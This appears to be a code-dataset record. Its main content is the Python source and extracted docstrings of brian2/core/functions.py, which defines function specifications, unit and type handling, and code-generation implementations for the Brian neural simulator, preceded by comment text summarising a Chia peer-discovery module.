| chia/server/node_discovery.py | 31,433 | This is a double check to make sure testnet and mainnet peer databases never mix up. If the network is not 'mainnet', it names the peer db differently, including the selected_network. Updates timestamps each time we receive a message for outbound connections. Mark it as a softer attempt, without counting the failures. We don't know any address, connect to the introducer to get some. Run dual between DNS servers and introducers. One time query DNS server, next two times query the introducer. there's some delay between receiving the peers from the introducer until they get incorporated to prevent this loop for running one more time. Add this delay to ensure that once we get peers, we stop contacting the introducer. keep doubling the introducer delay until we reach 5 minutes Only connect out to one peer per network group (/16 for IPv4). Feeler Connections Design goals: * Increase the number of connectable addresses in the tried table. Method: * Choose a random address from new and attempt to connect to it if we can connect successfully it is added to tried. * Start attempting feeler connections only after node finishes making outbound connections. * Only make a feeler connection once every few minutes. Require outbound connections, other than feelers, to be to distinct network groups. attempt a node once per 30 minutes. prune completed connect tasks Removes entries with timestamp worse than 14 days ago and with a high number of failed attempts. Most likely, the peer left the network, so we can save space in the peer tables. Perform the cleanup only if we have at least 3 connections. Check if we got the peers from a full node or from the introducer. Invalid timestamp, predefine a bad one. Clean up known nodes for neighbours every 24 hours. Self advertise every 24 hours. Prevent a fingerprint attack: do not send peers to inbound connections. This asymmetric behavior for inbound and outbound connections was introduced to prevent a fingerprinting attack: an attacker can send specific fake addresses to users' AddrMan and later request them by sending getaddr messages. Making nodes which are behind NAT and can only make outgoing connections ignore the request_peers message mitigates the attack. https://en.bitcoin.it/wiki/Satoshi_Client_Node_DiscoveryAddress_Relay | 2,294 | en | 0.924678 |
from collections.abc import Mapping
import inspect
import types
from typing import Callable
import numpy as np
import sympy
from sympy.codegen import cfunctions as sympy_cfunctions
from numpy.random import randn, rand
from sympy import Function as sympy_Function
from sympy import S
import brian2.units.unitsafefunctions as unitsafe
from brian2.core.preferences import prefs
from brian2.core.variables import Constant
from brian2.units.fundamentalunits import (fail_for_dimension_mismatch,
Quantity, get_dimensions,
DIMENSIONLESS, is_dimensionless)
from brian2.units.allunits import second
__all__ = ['DEFAULT_FUNCTIONS', 'Function', 'implementation', 'declare_types']
BRIAN_DTYPES = ['boolean', 'integer', 'float']
VALID_ARG_TYPES = BRIAN_DTYPES+['any']
VALID_RETURN_TYPES = BRIAN_DTYPES+['highest']
def declare_types(**types):
'''
Decorator to declare argument and result types for a function
Usage is similar to `check_units` except that types must be one of ``{VALID_ARG_TYPES}``
and the result type must be one of ``{VALID_RETURN_TYPES}``. Unspecified argument
    types are assumed to be ``'any'`` (i.e. anything is permitted), and an unspecified
result type is assumed to be ``'float'``. Note that the ``'highest'`` option for
result type will give the highest type of its argument, e.g. if the arguments
were boolean and integer then the result would be integer, if the arguments were
integer and float it would be float.
'''
def annotate_function_with_types(f):
if hasattr(f, '_orig_arg_names'):
arg_names = f._orig_arg_names
else:
arg_names = f.__code__.co_varnames[0:f.__code__.co_argcount]
argtypes = []
for name in arg_names:
arg_type = types.get(name, 'any')
if arg_type not in VALID_ARG_TYPES:
raise ValueError("Argument type %s is not valid, must be one of %s, "
"for argument %s" % (arg_type, VALID_ARG_TYPES, name))
argtypes.append(arg_type)
for n in types:
if n not in arg_names and n!='result':
raise ValueError("Type specified for unknown argument "+n)
return_type = types.get('result', 'float')
if return_type not in VALID_RETURN_TYPES:
raise ValueError("Result type %s is not valid, "
"must be one of %s" % (return_type, VALID_RETURN_TYPES))
f._arg_types = argtypes
f._return_type = return_type
f._orig_arg_names = arg_names
f._annotation_attributes = getattr(f, '_annotation_attributes', [])+['_arg_types', '_return_type']
return f
return annotate_function_with_types
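# Illustrative usage (added note, not part of the original module): the function
# below is hypothetical and only shows how declare_types attaches argument and
# result types to a user-defined function.
#
#     @declare_types(a='integer', b='integer', result='highest')
#     def add_ints(a, b):
#         return a + b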
class Function(object):
'''
An abstract specification of a function that can be used as part of
model equations, etc.
Parameters
----------
pyfunc : function
A Python function that is represented by this `Function` object.
sympy_func : `sympy.Function`, optional
A corresponding sympy function (if any). Allows functions to be
interpreted by sympy and potentially make simplifications. For example,
``sqrt(x**2)`` could be replaced by ``abs(x)``.
arg_units : list of `Unit`, optional
If `pyfunc` does not provide unit information (which typically means
that it was not annotated with a `check_units` decorator), the
units of the arguments have to specified explicitly using this
parameter.
return_unit : `Unit` or callable, optional
Same as for `arg_units`: if `pyfunc` does not provide unit information,
        this information has to be provided explicitly here. `return_unit` can
either be a specific `Unit`, if the function always returns the same
unit, or a function of the input units, e.g. a "square" function would
return the square of its input units, i.e. `return_unit` could be
specified as ``lambda u: u**2``.
arg_types : list of str, optional
Similar to `arg_units`, but gives the type of the argument rather than
its unit. In the current version of Brian arguments are specified
by one of the following strings: 'boolean', 'integer', 'float', 'any'.
If `arg_types` is not specified, 'any' will be assumed. In
future versions, a more refined specification may be possible. Note that
        any argument with a type other than float should have no units.
return_type : str, optional
Similar to `return_unit` and `arg_types`. In addition to 'boolean',
'integer' and 'float' you can also use 'highest' which will return the
highest type of its arguments. You can also give a function, as for
`return_unit`. If the return type is not specified, it is assumed to
be 'float'.
stateless : bool, optional
Whether this function does not have an internal state, i.e. if it
always returns the same output when called with the same arguments.
This is true for mathematical functions but not true for ``rand()``, for
example. Defaults to ``True``.
auto_vectorise : bool, optional
Whether the implementations of this function should get an additional
argument (not specified in abstract code) that can be used to determine
the number of values that should be returned (for the numpy target), or
an index potentially useful for generating deterministic values
independent of the order of vectorisation (for all other targets). The
main use case are random number functions, e.g. equations refer to
        ``rand()``, but the generated code will actually call
``rand(_vectorisation_idx)``. Defaults to ``False``.
Notes
-----
If a function should be usable for code generation targets other than
Python/numpy, implementations for these target languages have to be added
using the `~brian2.codegen.functions.implementation` decorator or using the
`~brian2.codegen.functions.add_implementations` function.
'''
def __init__(self, pyfunc, sympy_func=None,
arg_units=None, arg_names=None,
return_unit=None,
arg_types=None, return_type=None,
stateless=True, auto_vectorise=False):
self.pyfunc = pyfunc
self.sympy_func = sympy_func
self._arg_units = arg_units
self._arg_names = arg_names
self._return_unit = return_unit
if return_unit == bool:
self._returns_bool = True
else:
self._returns_bool = False
self._arg_types = arg_types
self._return_type = return_type
self.stateless = stateless
self.auto_vectorise = auto_vectorise
if self._arg_units is None:
if not hasattr(pyfunc, '_arg_units'):
raise ValueError(('The Python function "%s" does not specify '
'how it deals with units, need to specify '
'"arg_units" or use the "@check_units" '
'decorator.') % pyfunc.__name__)
elif pyfunc._arg_units is None:
# @check_units sets _arg_units to None if the units aren't
# specified for all of its arguments
raise ValueError(('The Python function "%s" does not specify '
'the units for all of its '
'arguments.') % pyfunc.__name__)
else:
self._arg_units = pyfunc._arg_units
else:
if any(isinstance(u, str) for u in self._arg_units):
if self._arg_names is None:
raise TypeError('Need to specify the names of the '
'arguments.')
if len(self._arg_names) != len(self._arg_units):
raise TypeError(f'arg_names and arg_units need to have the '
f'same length ({len(self._arg_names)} != '
                                    f'{len(self._arg_units)})')
if self._return_unit is None:
if not hasattr(pyfunc, '_return_unit'):
raise ValueError(('The Python function "%s" does not specify '
'how it deals with units, need to specify '
'"return_unit" or use the "@check_units" '
'decorator.') % pyfunc.__name__)
elif pyfunc._return_unit is None:
# @check_units sets _return_unit to None if no "result=..."
# keyword is specified.
raise ValueError(('The Python function "%s" does not specify '
'the unit for its return '
'value.') % pyfunc.__name__)
else:
self._return_unit = pyfunc._return_unit
if self._arg_types is None:
if hasattr(pyfunc, '_arg_types'):
self._arg_types = pyfunc._arg_types
else:
self._arg_types = ['any']*len(self._arg_units)
if self._return_type is None:
self._return_type = getattr(pyfunc, '_return_type', 'float')
for argtype, u in zip(self._arg_types, self._arg_units):
if argtype!='float' and argtype!='any' and u is not None and not is_dimensionless(u):
raise TypeError("Non-float arguments must be dimensionless in function "+pyfunc.__name__)
if argtype not in VALID_ARG_TYPES:
raise ValueError("Argument type %s is not valid, must be one of %s, "
"in function %s" % (argtype, VALID_ARG_TYPES, pyfunc.__name__))
if self._return_type not in VALID_RETURN_TYPES:
raise ValueError("Return type %s is not valid, must be one of %s, "
"in function %s" % (self._return_type, VALID_RETURN_TYPES, pyfunc.__name__))
#: Stores implementations for this function in a
#: `FunctionImplementationContainer`
self.implementations = FunctionImplementationContainer(self)
def is_locally_constant(self, dt):
'''
Return whether this function (if interpreted as a function of time)
should be considered constant over a timestep. This is most importantly
used by `TimedArray` so that linear integration can be used. In its
standard implementation, always returns ``False``.
Parameters
----------
dt : float
The length of a timestep (without units).
Returns
-------
constant : bool
Whether the results of this function can be considered constant
over one timestep of length `dt`.
'''
return False
def __call__(self, *args):
return self.pyfunc(*args)
class FunctionImplementation(object):
'''
A simple container object for function implementations.
Parameters
----------
name : str, optional
The name of the function in the target language. Should only be
specified if the function has to be renamed for the target language.
code : language-dependent, optional
A language dependent argument specifying the implementation in the
target language, e.g. a code string or a dictionary of code strings.
namespace : dict-like, optional
A dictionary of mappings from names to values that should be added
to the namespace of a `CodeObject` using the function.
dependencies : dict-like, optional
A mapping of names to `Function` objects, for additional functions
needed by this function.
availability_check : callable, optional
A function that will be called to check whether the function should be
made available (e.g. depending on whether it is supported by the
compiler). The function should do nothing if the function is
available, or raise a ``NotImplementedError`` with a message
explaining why it isn't.
dynamic : bool, optional
Whether this `code`/`namespace` is dynamic, i.e. generated for each
new context it is used in. If set to ``True``, `code` and `namespace`
have to be callable with a `Group` as an argument and are expected
to return the final `code` and `namespace`. Defaults to ``False``.
'''
def __init__(self, name=None, code=None, namespace=None,
dependencies=None, availability_check=None,
dynamic=False, compiler_kwds=None):
if compiler_kwds is None:
compiler_kwds = {}
self.name = name
if dependencies is None:
dependencies = {}
self.dependencies = dependencies
self._code = code
self._namespace = namespace
self.dynamic = dynamic
self.compiler_kwds = compiler_kwds
self.availability_check = availability_check
def get_code(self, owner):
if self.availability_check is not None:
self.availability_check()
if self.dynamic:
return self._code(owner)
else:
return self._code
def get_namespace(self, owner):
if self.dynamic:
return self._namespace(owner)
else:
return self._namespace
class FunctionImplementationContainer(Mapping):
'''
Helper object to store implementations and give access in a dictionary-like
fashion, using `CodeGenerator` implementations as a fallback for `CodeObject`
implementations.
'''
def __init__(self, function):
self._function = function
self._implementations = dict()
def __getitem__(self, key):
'''
Find an implementation for this function that can be used by the
`CodeObject` given as `key`. Will find implementations registered
for `key` itself (or one of its parents), or for the `CodeGenerator`
class that `key` uses (or one of its parents). In all cases,
implementations registered for the corresponding names qualify as well.
Parameters
----------
key : `CodeObject`
The `CodeObject` that will use the `Function`
Returns
-------
implementation : `FunctionImplementation`
An implementation suitable for `key`.
'''
fallback = getattr(key, 'generator_class', None)
# in some cases we do the code generation with original_generator_class instead (e.g. GSL)
fallback_parent = getattr(key, 'original_generator_class', None)
for K in [key, fallback, fallback_parent]:
name = getattr(K, 'class_name',
'no class name for key')
for impl_key, impl in self._implementations.items():
impl_key_name = getattr(impl_key, 'class_name',
'no class name for implementation')
if ((impl_key_name is not None and impl_key_name in [K, name]) or
(impl_key is not None and impl_key in [K, name])):
return impl
if hasattr(K, '__bases__'):
for cls in inspect.getmro(K):
if cls in self._implementations:
return self._implementations[cls]
name = getattr(cls, 'class_name', None)
if name in self._implementations:
return self._implementations[name]
# Give a nicer error message if possible
if getattr(key, 'class_name', None) is not None:
key = key.class_name
elif getattr(fallback, 'class_name', None) is not None:
key = fallback.class_name
keys = ', '.join([getattr(k, 'class_name', str(k))
for k in self._implementations])
raise KeyError(('No implementation available for target {key}. '
'Available implementations: {keys}').format(key=key,
keys=keys))
def add_numpy_implementation(self, wrapped_func, dependencies=None,
discard_units=None, compiler_kwds=None):
'''
Add a numpy implementation to a `Function`.
Parameters
----------
function : `Function`
The function description for which an implementation should be added.
wrapped_func : callable
The original function (that will be used for the numpy implementation)
dependencies : list of `Function`, optional
A list of functions this function needs.
discard_units : bool, optional
See `implementation`.
'''
if discard_units is None:
discard_units = prefs['codegen.runtime.numpy.discard_units']
# Get the original function inside the check_units decorator
if hasattr(wrapped_func, '_orig_func'):
orig_func = wrapped_func._orig_func
else:
orig_func = wrapped_func
if discard_units:
new_globals = dict(orig_func.__globals__)
# strip away units in the function by changing its namespace
for key, value in new_globals.items():
if isinstance(value, Quantity):
new_globals[key] = np.asarray(value)
unitless_func = types.FunctionType(orig_func.__code__, new_globals,
orig_func.__name__,
orig_func.__defaults__,
orig_func.__closure__)
self._implementations['numpy'] = FunctionImplementation(name=None,
code=unitless_func,
dependencies=dependencies,
compiler_kwds=None)
else:
def wrapper_function(*args):
arg_units = list(self._function._arg_units)
if self._function.auto_vectorise:
arg_units += [DIMENSIONLESS]
if not len(args) == len(arg_units):
raise ValueError(('Function %s got %d arguments, '
'expected %d') % (self._function.pyfunc.__name__, len(args),
len(arg_units)))
new_args = []
for arg, arg_unit in zip(args, arg_units):
if arg_unit == bool or arg_unit is None or isinstance(arg_unit, str):
new_args.append(arg)
else:
new_args.append(Quantity.with_dimensions(arg,
get_dimensions(arg_unit)))
result = orig_func(*new_args)
if isinstance(self._function._return_unit, Callable):
return_unit = self._function._return_unit(*[get_dimensions(a)
for a in args])
else:
return_unit = self._function._return_unit
if return_unit == bool:
if not (isinstance(result, bool) or
np.asarray(result).dtype == bool):
raise TypeError('The function %s returned '
'%s, but it was expected '
'to return a boolean '
'value ' % (orig_func.__name__,
result))
elif (isinstance(return_unit, int) and return_unit == 1) or return_unit.dim is DIMENSIONLESS:
fail_for_dimension_mismatch(result,
return_unit,
'The function %s returned '
'{value}, but it was expected '
'to return a dimensionless '
'quantity' % orig_func.__name__,
value=result)
else:
fail_for_dimension_mismatch(result,
return_unit,
('The function %s returned '
'{value}, but it was expected '
'to return a quantity with '
'units %r') % (orig_func.__name__,
return_unit),
value=result)
return np.asarray(result)
self._implementations['numpy'] = FunctionImplementation(name=None,
code=wrapper_function,
dependencies=dependencies)
def add_implementation(self, target, code, namespace=None,
dependencies=None, availability_check=None,
name=None, compiler_kwds=None):
self._implementations[target] = FunctionImplementation(name=name,
code=code,
dependencies=dependencies,
availability_check=availability_check,
namespace=namespace,
compiler_kwds=compiler_kwds)
def add_dynamic_implementation(self, target, code, namespace=None,
dependencies=None, availability_check=None,
name=None, compiler_kwds=None):
'''
Adds an "dynamic implementation" for this function. `code` and `namespace`
arguments are expected to be callables that will be called in
`Network.before_run` with the owner of the `CodeObject` as an argument.
This allows to generate code that depends on details of the context it
is run in, e.g. the ``dt`` of a clock.
'''
if not callable(code):
raise TypeError('code argument has to be a callable, is type %s instead' % type(code))
if namespace is not None and not callable(namespace):
            raise TypeError('namespace argument has to be a callable, is type %s instead' % type(namespace))
self._implementations[target] = FunctionImplementation(name=name,
code=code,
namespace=namespace,
dependencies=dependencies,
availability_check=availability_check,
dynamic=True,
compiler_kwds=compiler_kwds)
def __len__(self):
return len(self._implementations)
def __iter__(self):
return iter(self._implementations)
def implementation(target, code=None, namespace=None, dependencies=None,
discard_units=None, name=None, **compiler_kwds):
'''
A simple decorator to extend user-written Python functions to work with code
generation in other languages.
Parameters
----------
target : str
Name of the code generation target (e.g. ``'cython'``) for which to add
an implementation.
code : str or dict-like, optional
What kind of code the target language expects is language-specific,
e.g. C++ code allows for a dictionary of code blocks instead of a
single string.
namespaces : dict-like, optional
A namespace dictionary (i.e. a mapping of names to values) that
should be added to a `CodeObject` namespace when using this function.
dependencies : dict-like, optional
A mapping of names to `Function` objects, for additional functions
needed by this function.
discard_units: bool, optional
Numpy functions can internally make use of the unit system. However,
during a simulation run, state variables are passed around as unitless
values for efficiency. If `discard_units` is set to ``False``, input
arguments will have units added to them so that the function can still
use units internally (the units will be stripped away from the return
value as well). Alternatively, if `discard_units` is set to ``True``,
the function will receive unitless values as its input. The namespace
of the function will be altered to make references to units (e.g.
``ms``) refer to the corresponding floating point values so that no
unit mismatch errors are raised. Note that this system cannot work in
        all cases, e.g. it does not work with functions that internally import
values (e.g. does ``from brian2 import ms``) or access values with
units indirectly (e.g. uses ``brian2.ms`` instead of ``ms``). If no
value is given, defaults to the preference setting
`codegen.runtime.numpy.discard_units`.
name : str, optional
The name of the function in the target language. Should only be
specified if the function has to be renamed for the target language.
compiler_kwds : dict, optional
Additional keyword arguments will be transferred to the code generation
stage, e.g. for C++-based targets, the code can make use of additional
header files by providing a list of strings as the ``headers`` argument.
Notes
-----
While it is in principle possible to provide a numpy implementation
as an argument for this decorator, this is normally not necessary -- the
numpy implementation should be provided in the decorated function.
If this decorator is used with other decorators such as `check_units` or
`declare_types`, it should be the uppermost decorator (that is, the
last one to be applied).
Examples
--------
Sample usage::
@implementation('cpp',"""
#include<math.h>
inline double usersin(double x)
{
return sin(x);
}
""")
def usersin(x):
return sin(x)
'''
def do_user_implementation(func):
# Allow nesting of decorators
if isinstance(func, Function):
function = func
else:
function = Function(func)
if discard_units: # Add a numpy implementation that discards units
if not (target == 'numpy' and code is None):
raise TypeError(("'discard_units' can only be set for code "
"generation target 'numpy', without providing "
"any code."))
function.implementations.add_numpy_implementation(wrapped_func=func,
dependencies=dependencies,
discard_units=discard_units,
compiler_kwds=compiler_kwds)
else:
function.implementations.add_implementation(target, code=code,
dependencies=dependencies,
namespace=namespace,
name=name,
compiler_kwds=compiler_kwds)
# # copy any annotation attributes
# if hasattr(func, '_annotation_attributes'):
# for attrname in func._annotation_attributes:
# setattr(function, attrname, getattr(func, attrname))
# function._annotation_attributes = getattr(func, '_annotation_attributes', [])
return function
return do_user_implementation
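# Illustrative companion example (added note; the 'cython' target syntax is an
# assumption based on Brian's Cython code generation, not taken from this module):
# the same user function could also be given a Cython implementation.
#
#     @implementation('cython', '''
#         cdef double usersin(double x):
#             return sin(x)
#         ''')
#     def usersin(x):
#         return sin(x)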
class SymbolicConstant(Constant):
'''
Class for representing constants (e.g. pi) that are understood by sympy.
'''
def __init__(self, name, sympy_obj, value):
super(SymbolicConstant, self).__init__(name, value=value)
self.sympy_obj = sympy_obj
################################################################################
# Standard functions and constants
################################################################################
def _exprel(x):
if x.is_zero:
return S.One
else:
return (sympy.exp(x) - S.One)/x
class exprel(sympy_Function):
"""
Represents ``(exp(x) - 1)/x``.
The benefit of using ``exprel(x)`` over ``(exp(x) - 1)/x``
is that the latter is prone to cancellation under finite precision
arithmetic when x is close to zero, and cannot be evaluated when x is
equal to zero.
"""
nargs = 1
def fdiff(self, argindex=1):
"""
Returns the first derivative of this function.
"""
if argindex == 1:
return (sympy.exp(*self.args)*(self.args[0] - S.One) + S.One)/self.args[0]**2
else:
raise sympy.ArgumentIndexError(self, argindex)
def _eval_expand_func(self, **hints):
return _exprel(*self.args)
def _eval_rewrite_as_exp(self, arg, **kwargs):
if arg.is_zero:
return S.One
else:
return (sympy.exp(arg) - S.One)/arg
_eval_rewrite_as_tractable = _eval_rewrite_as_exp
@classmethod
def eval(cls, arg):
if arg is None:
return None
if arg.is_zero:
return S.One
exp_arg = sympy.exp.eval(arg)
if exp_arg is not None:
return (exp_arg - S.One)/arg
def _eval_is_real(self):
return self.args[0].is_real
def _eval_is_finite(self):
return self.args[0].is_finite
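# Added note: the dedicated exprel function matters numerically because the naive
# expression (exp(x) - 1)/x underflows to 0.0 for x around 1e-16 (exp(x) rounds to
# exactly 1.0 in double precision), whereas the true value approaches 1.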
_infinity_int = 1073741823 # maximum 32bit integer divided by 2
def timestep(t, dt):
'''
Converts a given time to an integer time step. This function slightly shifts
the time before dividing it by ``dt`` to make sure that multiples of ``dt``
do not end up in the preceding time step due to floating point issues. This
function is used in the refractoriness calculation.
.. versionadded:: 2.1.3
Parameters
----------
t : np.ndarray, float, Quantity
The time to convert.
dt : float or Quantity
The length of a simulation time step.
Returns
-------
ts : np.ndarray, np.int64
The time step corresponding to the given time.
Notes
-----
This function cannot handle infinity values, use big values instead (e.g.
a `NeuronGroup` will use ``-1e4*second`` as the value of the ``lastspike``
variable for neurons that never spiked).
'''
elapsed_steps = np.array((t + 1e-3*dt)/dt, dtype=np.int64)
if elapsed_steps.shape == ():
elapsed_steps = elapsed_steps.item()
return elapsed_steps
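# Illustrative example (added note): a naive int(t/dt) can land in the wrong bin,
# e.g. int(0.3/0.1) == 2 because 0.3/0.1 evaluates to 2.999...96 in floating point,
# while timestep(0.3, 0.1) returns 3 thanks to the small 1e-3*dt shift.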
DEFAULT_FUNCTIONS = {
# numpy functions that have the same name in numpy and math.h
'cos': Function(unitsafe.cos,
sympy_func=sympy.functions.elementary.trigonometric.cos),
'sin': Function(unitsafe.sin,
sympy_func=sympy.functions.elementary.trigonometric.sin),
'tan': Function(unitsafe.tan,
sympy_func=sympy.functions.elementary.trigonometric.tan),
'cosh': Function(unitsafe.cosh,
sympy_func=sympy.functions.elementary.hyperbolic.cosh),
'sinh': Function(unitsafe.sinh,
sympy_func=sympy.functions.elementary.hyperbolic.sinh),
'tanh': Function(unitsafe.tanh,
sympy_func=sympy.functions.elementary.hyperbolic.tanh),
'exp': Function(unitsafe.exp,
sympy_func=sympy.functions.elementary.exponential.exp),
'log': Function(unitsafe.log,
sympy_func=sympy.functions.elementary.exponential.log),
'log10': Function(unitsafe.log10,
sympy_func=sympy_cfunctions.log10),
'expm1': Function(unitsafe.expm1,
sympy_func=sympy_cfunctions.expm1),
'exprel': Function(unitsafe.exprel,
sympy_func=exprel),
'log1p': Function(unitsafe.log1p,
sympy_func=sympy_cfunctions.log1p),
'sqrt': Function(np.sqrt,
sympy_func=sympy.functions.elementary.miscellaneous.sqrt,
arg_units=[None], return_unit=lambda u: u**0.5),
'ceil': Function(np.ceil,
sympy_func=sympy.functions.elementary.integers.ceiling,
arg_units=[None], return_unit=lambda u: u),
'floor': Function(np.floor,
sympy_func=sympy.functions.elementary.integers.floor,
arg_units=[None], return_unit=lambda u: u),
# numpy functions that have a different name in numpy and math.h
'arccos': Function(unitsafe.arccos,
sympy_func=sympy.functions.elementary.trigonometric.acos),
'arcsin': Function(unitsafe.arcsin,
sympy_func=sympy.functions.elementary.trigonometric.asin),
'arctan': Function(unitsafe.arctan,
sympy_func=sympy.functions.elementary.trigonometric.atan),
'abs': Function(np.abs, return_type='highest',
sympy_func=sympy.functions.elementary.complexes.Abs,
arg_units=[None], return_unit=lambda u: u),
'sign': Function(pyfunc=np.sign, sympy_func=sympy.sign, return_type='highest',
arg_units=[None], return_unit=1),
# functions that need special treatment
'rand': Function(pyfunc=rand, arg_units=[], return_unit=1, stateless=False, auto_vectorise=True),
'randn': Function(pyfunc=randn, arg_units=[], return_unit=1, stateless=False, auto_vectorise=True),
'poisson': Function(pyfunc=np.random.poisson, arg_units=[1], return_unit=1, return_type='integer',
stateless=False, auto_vectorise=True),
'clip': Function(pyfunc=np.clip,
arg_units=[None, 'a', 'a'],
arg_names=['a', 'a_min', 'a_max'],
return_type='highest',
return_unit=lambda u1, u2, u3: u1),
'int': Function(pyfunc=np.int_, return_type='integer',
arg_units=[1], return_unit=1),
'timestep': Function(pyfunc=timestep, return_type='integer',
arg_units=[second, second], return_unit=1)
}
DEFAULT_CONSTANTS = {'pi': SymbolicConstant('pi', sympy.pi, value=np.pi),
'e': SymbolicConstant('e', sympy.E, value=np.e),
'inf': SymbolicConstant('inf', S.Infinity,
value=np.inf),
'-inf': SymbolicConstant('-inf', S.NegativeInfinity,
value=-np.inf)}
| brian2/core/functions.py | 35,780 | An abstract specification of a function that can be used as part of
model equations, etc.
Parameters
----------
pyfunc : function
A Python function that is represented by this `Function` object.
sympy_func : `sympy.Function`, optional
A corresponding sympy function (if any). Allows functions to be
interpreted by sympy and potentially make simplifications. For example,
``sqrt(x**2)`` could be replaced by ``abs(x)``.
arg_units : list of `Unit`, optional
If `pyfunc` does not provide unit information (which typically means
that it was not annotated with a `check_units` decorator), the
units of the arguments have to specified explicitly using this
parameter.
return_unit : `Unit` or callable, optional
Same as for `arg_units`: if `pyfunc` does not provide unit information,
this information has to be provided explictly here. `return_unit` can
either be a specific `Unit`, if the function always returns the same
unit, or a function of the input units, e.g. a "square" function would
return the square of its input units, i.e. `return_unit` could be
specified as ``lambda u: u**2``.
arg_types : list of str, optional
Similar to `arg_units`, but gives the type of the argument rather than
its unit. In the current version of Brian arguments are specified
by one of the following strings: 'boolean', 'integer', 'float', 'any'.
If `arg_types` is not specified, 'any' will be assumed. In
future versions, a more refined specification may be possible. Note that
any argument with a type other than float should have no units. If
return_type : str, optional
Similar to `return_unit` and `arg_types`. In addition to 'boolean',
'integer' and 'float' you can also use 'highest' which will return the
highest type of its arguments. You can also give a function, as for
`return_unit`. If the return type is not specified, it is assumed to
be 'float'.
stateless : bool, optional
Whether this function does not have an internal state, i.e. if it
always returns the same output when called with the same arguments.
This is true for mathematical functions but not true for ``rand()``, for
example. Defaults to ``True``.
auto_vectorise : bool, optional
Whether the implementations of this function should get an additional
argument (not specified in abstract code) that can be used to determine
the number of values that should be returned (for the numpy target), or
an index potentially useful for generating deterministic values
independent of the order of vectorisation (for all other targets). The
main use case are random number functions, e.g. equations refer to
``rand()``, but the generate code will actually call
``rand(_vectorisation_idx)``. Defaults to ``False``.
Notes
-----
If a function should be usable for code generation targets other than
Python/numpy, implementations for these target languages have to be added
using the `~brian2.codegen.functions.implementation` decorator or using the
`~brian2.codegen.functions.add_implementations` function.
A simple container object for function implementations.
Parameters
----------
name : str, optional
The name of the function in the target language. Should only be
specified if the function has to be renamed for the target language.
code : language-dependent, optional
A language dependent argument specifying the implementation in the
target language, e.g. a code string or a dictionary of code strings.
namespace : dict-like, optional
A dictionary of mappings from names to values that should be added
to the namespace of a `CodeObject` using the function.
dependencies : dict-like, optional
A mapping of names to `Function` objects, for additional functions
needed by this function.
availability_check : callable, optional
A function that will be called to check whether the function should be
made available (e.g. depending on whether it is supported by the
compiler). The function should do nothing if the function is
available, or raise a ``NotImplementedError`` with a message
explaining why it isn't.
dynamic : bool, optional
Whether this `code`/`namespace` is dynamic, i.e. generated for each
new context it is used in. If set to ``True``, `code` and `namespace`
have to be callable with a `Group` as an argument and are expected
to return the final `code` and `namespace`. Defaults to ``False``.
Helper object to store implementations and give access in a dictionary-like
fashion, using `CodeGenerator` implementations as a fallback for `CodeObject`
implementations.
Class for representing constants (e.g. pi) that are understood by sympy.
Represents ``(exp(x) - 1)/x``.
The benefit of using ``exprel(x)`` over ``(exp(x) - 1)/x``
is that the latter is prone to cancellation under finite precision
arithmetic when x is close to zero, and cannot be evaluated when x is
equal to zero.
Find an implementation for this function that can be used by the
`CodeObject` given as `key`. Will find implementations registered
for `key` itself (or one of its parents), or for the `CodeGenerator`
class that `key` uses (or one of its parents). In all cases,
implementations registered for the corresponding names qualify as well.
Parameters
----------
key : `CodeObject`
The `CodeObject` that will use the `Function`
Returns
-------
implementation : `FunctionImplementation`
An implementation suitable for `key`.
Adds an "dynamic implementation" for this function. `code` and `namespace`
arguments are expected to be callables that will be called in
`Network.before_run` with the owner of the `CodeObject` as an argument.
This allows to generate code that depends on details of the context it
is run in, e.g. the ``dt`` of a clock.
Add a numpy implementation to a `Function`.
Parameters
----------
function : `Function`
The function description for which an implementation should be added.
wrapped_func : callable
The original function (that will be used for the numpy implementation)
dependencies : list of `Function`, optional
A list of functions this function needs.
discard_units : bool, optional
See `implementation`.
Decorator to declare argument and result types for a function
Usage is similar to `check_units` except that types must be one of ``{VALID_ARG_TYPES}``
and the result type must be one of ``{VALID_RETURN_TYPES}``. Unspecified argument
types are assumed to be ``'all'`` (i.e. anything is permitted), and an unspecified
result type is assumed to be ``'float'``. Note that the ``'highest'`` option for
result type will give the highest type of its argument, e.g. if the arguments
were boolean and integer then the result would be integer, if the arguments were
integer and float it would be float.
Returns the first derivative of this function.
A simple decorator to extend user-written Python functions to work with code
generation in other languages.
Parameters
----------
target : str
Name of the code generation target (e.g. ``'cython'``) for which to add
an implementation.
code : str or dict-like, optional
What kind of code the target language expects is language-specific,
e.g. C++ code allows for a dictionary of code blocks instead of a
single string.
namespaces : dict-like, optional
A namespace dictionary (i.e. a mapping of names to values) that
should be added to a `CodeObject` namespace when using this function.
dependencies : dict-like, optional
A mapping of names to `Function` objects, for additional functions
needed by this function.
discard_units: bool, optional
Numpy functions can internally make use of the unit system. However,
during a simulation run, state variables are passed around as unitless
values for efficiency. If `discard_units` is set to ``False``, input
arguments will have units added to them so that the function can still
use units internally (the units will be stripped away from the return
value as well). Alternatively, if `discard_units` is set to ``True``,
the function will receive unitless values as its input. The namespace
of the function will be altered to make references to units (e.g.
``ms``) refer to the corresponding floating point values so that no
unit mismatch errors are raised. Note that this system cannot work in
all cases, e.g. it does not work with functions that internally imports
values (e.g. does ``from brian2 import ms``) or access values with
units indirectly (e.g. uses ``brian2.ms`` instead of ``ms``). If no
value is given, defaults to the preference setting
`codegen.runtime.numpy.discard_units`.
name : str, optional
The name of the function in the target language. Should only be
specified if the function has to be renamed for the target language.
compiler_kwds : dict, optional
Additional keyword arguments will be transferred to the code generation
stage, e.g. for C++-based targets, the code can make use of additional
header files by providing a list of strings as the ``headers`` argument.
Notes
-----
While it is in principle possible to provide a numpy implementation
as an argument for this decorator, this is normally not necessary -- the
numpy implementation should be provided in the decorated function.
If this decorator is used with other decorators such as `check_units` or
`declare_types`, it should be the uppermost decorator (that is, the
last one to be applied).
Examples
--------
Sample usage::
@implementation('cpp',"""
#include<math.h>
inline double usersin(double x)
{
return sin(x);
}
""")
def usersin(x):
return sin(x)
Return whether this function (if interpreted as a function of time)
should be considered constant over a timestep. This is most importantly
used by `TimedArray` so that linear integration can be used. In its
standard implementation, always returns ``False``.
Parameters
----------
dt : float
The length of a timestep (without units).
Returns
-------
constant : bool
Whether the results of this function can be considered constant
over one timestep of length `dt`.
Converts a given time to an integer time step. This function slightly shifts
the time before dividing it by ``dt`` to make sure that multiples of ``dt``
do not end up in the preceding time step due to floating point issues. This
function is used in the refractoriness calculation.
.. versionadded:: 2.1.3
Parameters
----------
t : np.ndarray, float, Quantity
The time to convert.
dt : float or Quantity
The length of a simulation time step.
Returns
-------
ts : np.ndarray, np.int64
